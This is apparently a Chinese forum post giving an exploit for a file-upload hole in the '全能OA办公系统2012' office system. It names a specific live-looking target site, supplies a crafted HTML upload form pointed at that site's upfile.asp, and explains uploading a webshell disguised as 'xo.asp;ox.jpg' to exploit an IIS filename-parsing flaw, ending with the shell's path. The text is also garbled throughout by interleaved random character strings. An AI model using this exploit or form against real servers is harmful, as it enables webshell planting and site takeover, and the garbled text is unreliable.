全能OA办公系统 上传漏洞
3 X2 h" r" b+ u& _1 @" ]! E% L8 S1 j; C& d2 B
系统介绍:2 F' n$ V- b7 q' s) k
9 d: C) }- j1 n全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。: u! \8 m5 x0 b9 j8 L. L: H
: X; R0 _/ f0 x! S) q! h9 `) Y* v主要功能:0 m) e+ S' w- {" X, @
公司通告
$ O' R3 e8 ?# }, U: U9 l工作计划 ' h8 Y6 b( k/ {. f* J3 O# d
通讯助理
: \7 l, e0 f; i: x- a( B客户资源 - s% h5 I ~ P1 ?; b1 x' u
我的公文 1 V4 C" p6 K5 O/ ^ [$ m
公文传阅 , J5 K1 V) ?4 x
公共资源 . P7 K- }3 l4 e
资源预约 * o, ]8 \8 V0 ?) ?. @
今日考勤
) f$ r+ P+ e; W; \1 I0 B' u个人计划
: ]" E, C! T! {个人通讯录 ; e% q u9 V! k) @/ W
个人基本档案 * z8 f" [0 c$ A5 l& Y4 h7 Q+ W" }2 E
未读邮件 * D" u! N6 ] m) @9 m4 B
发邮件 ; E9 f9 g2 h; K0 u0 l" v# ~
收件夹
2 C. f! K: F. G8 w6 X& \2 d' f寄件夹 + r5 f' h: v& t. m
网络硬盘 0 ~+ c$ v9 q. ]+ D% \, Y1 L
网络会议 ! f0 Z# v! y7 E3 `9 q# A
网络调查
6 _; _8 E, r2 G; z; Z* z& {交流论坛
) l& f4 T, U6 ?* j h% I4 z c- _3 t1 n; L
有兴趣测试的朋友可以下源码看看
, O: E0 j/ _+ A" r! a2 W d$ o4 S) q! D' S
源码下载:
6 O9 [* j: t7 g) U7 l1 J( i7 {9 h. Z/ o+ ^+ g2 s3 G# d! N% e* H' `
http://www.mycodes.net/30/4750.htm! W, Q) d& k& l* R4 f! m% k0 p
; I- x' B' L) b K& a
漏洞介绍:
" F% g: K# o1 s5 f$ I0 E
' C% S# E! c1 f- Z由upfile.asp上传文件漏洞引起
& M2 V2 D# v" M+ R- K8 t. b2 _+ b! }/ }7 ^
测试方法:
) @& R; _% S3 [$ V+ r
9 e$ Z! r) e% t/ ?# f- P4 d; O使用名小子上传http://www.itlynn.com/upfile.asp即可
8 n2 R! C# G, }+ p3 p$ E
- Q- I1 k8 L# D4 m% ~4 R ]/ }如果upfile.asp文件被删除不存在。
) i- l, q, e- a' e% U+ ]5 c- N/ V4 F7 j% Q* U
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
$ N$ S* B! g5 B% K+ H9 u
! @: x- U8 Z; V& P7 @如果存在那么将如下代码保存为upfile.html。4 a$ J4 T6 M8 d- q
3 ]" k' W8 ~/ G" Y( M然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
& |) @/ |5 U+ y9 F0 k/ L) {7 z
9 d/ h* ]$ C2 a* Z' K9 A+ ?$ e9 [
# U1 g, m( [- P. x8 X2 F3 l; n& p, ?. W: }; X5 e
01 <table border='0' align="center" cellpadding="5"> $ p* \, \3 B/ Z$ i6 D- f( k7 Q4 S; J
4 w5 A" ?$ `7 z, J- q1 I6 t" u02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> ; G" q5 U2 V, M3 i
: [8 {: T+ B0 w: j6 }; p; Z
03 <tr> + z( S" p% c2 V( I
/ C$ e3 q/ j7 i$ h0 d7 i
04 <td>报错:</td> 5 q) r0 g6 s+ l: K5 N9 I
4 \5 k& _0 \, F9 o" W; j4 C1 @05 <td><input type='radio' name='errnumber' value='0'> ( T+ W( N- R# f( O
; M: ~0 n, R1 o0 z" h; u06 自动更名
) k# ]& n [/ k3 [ H( G6 x7 [3 c0 j O# J7 B5 a* Q9 j
07 <input type='radio' name='errnumber' value='1' checked>
, N& s* z% i/ f) |2 z& e4 h, s4 S3 P8 T& E
08 报错方式 ( K/ I, h% e4 e* u$ d [! G
8 z/ u8 h4 ]1 t: H3 E# O9 `" X% y09 <input type='radio' name='errnumber' value='2'> : b3 E1 d2 ^5 i) x1 x9 Y2 V
4 ] `3 B; p+ N& K+ }( ~
10 直接覆盖</td> 3 W) z; W2 @9 B; Q7 U$ o! N
( Y1 z7 q D2 P
11 </tr> ; r- r& Z7 ?# \6 w' M
5 O8 _- W- J$ x# @- i12 <tr> b8 G6 T: u t) J) o
4 |1 M- l+ e# ]* }/ M% ^0 v2 @
13 <td>主题:</td>
G5 v5 E% I7 l8 N2 O5 c* H; a) H1 _# R$ R
14 <td><input type='text' name='filename' size='30'></td> / |& G, Z# o# h1 T
5 @* F! e" X' s d O: M9 i
15 </tr> : n2 S, I7 Y% y
8 u1 N* M7 H0 R; D% u7 S& V
16 <tr>
3 U1 y6 j& g) _/ ^
1 s; b6 O' n7 Z17 <td>文件:</td>
2 @1 H: k7 {' d4 j1 b- e( @# y, P% @2 O
18 <td><input type="file"name="fruit"size="30"></td> 2 }& p/ H! q+ E4 A. W& b, Z
- D& q8 J. N" r9 ?2 c19 </tr> ! ^1 U8 Q; X4 ^2 T! i& O
1 N* x' H" ~$ R$ [! ]8 r& ]* n* r
20 <tr>
+ v1 L/ y. X- u6 c
Q6 e5 c K" j6 ?2 F% ~' D% P21 <td valign='top'>简介:</td>
1 T, v7 w; t5 N
( @+ p# W/ N8 U, w22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
) o6 [& O) e, X! X
( ?7 F+ o! W f1 x/ [* a23 </tr>
2 ?+ e/ J9 l! ~1 K6 [1 W
' |9 R, G: O6 Y1 t+ ^24
! u0 {: V4 e8 [7 r8 l- U/ g: n
6 g6 S0 f! o# G2 }4 Y6 [3 Y1 P6 M25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ( m* Y, r8 I3 O6 O# W* [* o/ |) t
( _2 U- R, S1 g
26 </tr> 4 D4 B6 D1 v1 [- O/ E- {
# Y1 q2 k& P3 _) ?8 b3 Y& s27 </form>
9 j& t( H/ V+ N0 c" e1 o4 ?" X, m- ]) M a; }
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
; |. @ ]% \3 v
+ O" [; T/ ^1 P* A# N0 ~ & `, Z1 o8 }+ I# L1 X% Z
/ n7 Y1 G, {. a) Q" i. c- U上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg. G& C5 I8 K3 y) S
; I! f6 r+ V& K7 i6 P4 A
此漏洞需要配合解析漏洞利用。/ E7 K7 s' t; x% o* A
! }2 {% x4 B2 W9 j0 k5 B |